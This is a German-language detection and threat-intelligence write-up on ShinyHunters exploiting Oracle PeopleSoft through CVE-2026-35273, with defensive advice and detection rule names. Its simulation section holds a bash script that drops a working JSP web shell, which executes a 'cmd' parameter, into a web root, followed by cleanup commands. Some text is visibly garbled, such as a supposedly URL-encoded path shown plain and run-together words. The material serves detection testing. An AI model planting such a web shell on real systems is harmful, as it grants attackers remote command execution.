ShinyHunters nimmt großangelegte Angriffe auf Oracle PeopleSoft wieder auf
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Der Bedrohungsakteur UNC6240 (ShinyHunters) hat die groß angelegte Ausnutzung von Oracle PeopleSoft-Systemen über CVE-2026-35273 wieder aufgenommen. Die Kampagne nutzt URL-kodierte Pfade, um Web Application Firewalls (WAF) zu umgehen und Zugriff auf den verwundbaren Environment Management Hub-Endpunkt zu erhalten. Angreifer setzen mehrere Web-Shells zusammen mit der SIDEEYE-Backdoor ein, um Persistenz herzustellen, unbefugten Zugriff zu erhalten und die Datenexfiltration zu erleichtern.
Untersuchung
Mandiant und die Google Threat Intelligence Group dokumentierten einen Übergang von Zero-Day-Exploitation im Juni 2026 zu N-Day-Angriffen gegen ungepatchte Umgebungen. Forscher identifizierten die Verwendung der URL-Codierung (/PSEMHUB/) um stringbasierte WAF-Filterung zu umgehen. Die Analyse zeigte eine wiederkehrende Angriffssequenz, die die Zielvalidierung durch serialisierte Java-Objekte umfasst, gefolgt von der Bereitstellung trotianisierter Installationsprogramme und Tunneling-Dienstprogramme.
Abschwächung
Organisationen sollten sofort den Oracle Security Alert-Patch installieren, der CVE-2026-35273 adressiert, und die PSEMHUB-Anwendung deaktivieren oder entfernen. WAF-Konfigurationen sollten normalisierte URL-Pfade inspizieren und blockieren, anstatt sich ausschließlich auf die Übereinstimmung mit wörtlichen Zeichenfolgen zu verlassen. Sicherheitsteams sollten auch Zugangsdaten, die vom Web-Zugangspunkt erreichbar sind, rotieren und Anwendungsverzeichnisse auf verdächtige oder unbefugte Dateien überprüfen.
Reaktion
Falls eine Web-Shell entdeckt wird, sollten Verteidiger den betroffenen Host als vollständig kompromittiert betrachten und forensische Beweise vor der Behebung bewahren. Aktivieren Sie das Host-übergreifende Audit, um unerwartete Shell-Prozesse zu identifizieren, die vom WebLogic-Java-Prozess gestartet werden. Rotieren Sie exponierte Zugangsdaten, einschließlich Datenbank-Verbindungszeichenfolgen und Cloud-Credentials, während Sie ausgehende Netzwerkaktivitäten auf bekannte C2-Indikatoren überprüfen.
Angriffsverlauf
Wir aktualisieren diesen Teil noch.
Erkennungen
Mögliche Systeminventarisierung (über cmdline)
Verdächtige Command-and-Control-Aktivität durch ungewöhnliche Top-Level-Domain (TLD) DNS-Anfrage (über dns)
Mögliche Manipulation von Base64-codierten Zeichenfolgen (über cmdline)
Remote-Datei-Upload/Download über Standard-Tools (über cmdline)
IOCs (HashSha256) zur Erkennung: Erneuerte Massenausnutzungskampagne der ShinyHunters, die auf Oracle PeopleSoft abzielt
IOCs (SourceIP) zur Erkennung: Erneuerte Massenausnutzungskampagne der ShinyHunters, die auf Oracle PeopleSoft abzielt
IOCs (DestinationIP) zur Erkennung: Erneuerte Massenausnutzungskampagne der ShinyHunters, die auf Oracle PeopleSoft abzielt
Web-Shell-Bereitstellung durch Ausnutzung von CVE-2026-35273 [Windows-Prozesserstellung]
UNC6240-Ausnutzung von Oracle PeopleSoft mit Web-Shells [Webserver]
Simulationsausführung
-
Angriffserzählung & Befehle: Der Gegner identifiziert eine Oracle PeopleSoft-Instanz und versucht, eine Schwachstelle auszunutzen. Um einfache WAF-Signaturen zu umgehen, die nach der Zeichenfolge „PSEMHUB“ suchen, verwendet der Angreifer URL-Kodierung, um anzufordern
/PSEMHUB/. Nach erfolgreicher Ausnutzung legt der Angreifer eine Web-Shell mit dem Namenx.jspim Web-Root ab, um eine persistente Oberfläche für die Befehlsausführung bereitzustellen. Diese Sequenz imitiert die spezifischen Indikatoren für Kompromittierungen (IOCs), die in der UNC6240-Ausnutzungskampagne identifiziert wurden. -
Regressionstest-Skript:
#!/bin/bash # Simulationsskript für UNC6240-Web-Shell-Erkennung # 1. Pfade definieren (Anpassen an Zielumgebung) WEB_ROOT="/var/www/html" SHELL_NAME="x.jsp" TARGET_URL="http://localhost/PSEMHUB/" echo "[+] Simulierte Web-Shell wird erstellt: $WEB_ROOT/$SHELL_NAME" # Einfachen JSP-Web-Shell-Inhalt erstellen echo '<% out.print(new java.util.Scanner(Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream()).useDelimiter("A").next()); %>' | sudo tee $WEB_ROOT/$SHELL_NAME > /dev/null echo "[+] Erkennung durch URL-codierte Anfrage auslösen..." # Verwenden Sie curl, um den codierten Pfad anzufordern und den Logeintrag zu erzeugen curl -s "$TARGET_URL" > /dev/null echo "[+] Simulation abgeschlossen. Prüfen Sie SIEM auf Erkennung." -
Bereinigungskommandos:
#!/bin/bash # Bereinigungsskript WEB_ROOT="/var/www/html" SHELL_NAME="x.jsp" echo "[+] Simulationdateien werden bereinigt..." sudo rm -f $WEB_ROOT/$SHELL_NAME echo "[+] Bereinigung abgeschlossen."